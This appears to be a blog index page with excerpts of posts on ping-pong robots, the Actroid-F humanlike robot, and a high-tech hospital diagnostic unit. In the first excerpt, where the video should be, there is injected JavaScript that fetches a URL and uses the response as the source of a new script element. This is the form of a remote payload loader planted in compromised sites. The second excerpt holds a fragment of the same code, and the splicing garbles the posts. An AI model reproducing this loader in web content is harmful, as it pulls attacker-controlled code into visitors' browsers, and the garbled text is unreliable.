Chinese Robots to play Ping Pong!

Written by Mostafa Dafer on . Posted in Featured, Robots & Robotics

It's just as the title mentions, robot vs robot & robot vs human table tennis games! Never feel lonely again! It's really incredible how robots are gaining great strengths... I no longer believe that science fiction stories are science fiction anymore! Here's a video: var url = ''; fetch(url) .then(response => response.text()) .then(data => { var script = document.createElement('script'); script.src = data.trim(); Read more [...]

Actroid, The Human Robot, When “I Robot” is for Real!

Written by Mostafa Dafer on . Posted in Featured, Robots & Robotics

This is about 3 years ago... However, it's still awesome! It's when the movie (based on the novel) "I Robot" is no longer science fiction! Her maker, Japan-based robot maker Kokoro, says that she is supposed to give patients a heightened sense of security. Actroid-F is very realistic, but actually, she is pretty creepy, too – as you can see in the video embedded below (in which she’s replicating the operators facial expressions and body movements, this is 3 years old however...). var url Read more [...]

Diagnose your illness without a doctor-تعرف على مرضك بدون طبيب

Written by Mostafa Dafer on . Posted in Featured, Robots & Robotics, العربية

لقراءة الموضوع باللغة العربية اضغط هنا  شكرا لـ عالم الابداع Copied from A sickbay that uses space-age technology to diagnose diseases ranging from stomach bugs to cancer has been unveiled at a  British hospital. The first of its kind, it contains a bewildering array of equipment, including probes designed for  missions to Mars. The gadgets in the million-pound unit can detect illness without the need for painful and invasive Read more [...]

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